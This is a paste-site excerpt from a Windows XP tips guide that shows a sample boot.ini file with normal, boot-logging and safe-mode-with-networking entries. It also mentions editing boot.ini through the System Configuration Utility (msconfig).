  5636. The boot.ini file would look like this, assuming that you want the menu to display for 30 seconds and you want normal XP startup to be the default:
  5637. [boot loader]
  5638. timeout=30
  5639. default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
  5640. [operating systems]
  5641. multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Home
  5642. Edition" /fastdetect
  5643. multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Trace Problems XP Home Edition"
  5644. /fastdetect /bootlog /sos
  5645. multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Safe Start XP Home Edition" /
  5646. fastdetect /safeboot:network
  5647.  
  5648.  
  5649.  If you're leery of using a text editor to edit boot.ini directly, you can use the System Configuration Utility  instead. Type msconfig at a command prompt or the Run box and click on the BOOT.INI tab, shown in. You'll be able to add several switches (but not as many as you can if you edit the boot.ini file yourself using a text editor).
  5650.  
  5651.  
  5652. The System Configuration Utility
  5653.  
  5654.  
  5655.  
  5656.  
  5657.  
  5658. original from : http://www.the-cybers-skills.blogspot.com
clone this paste RAW Paste Data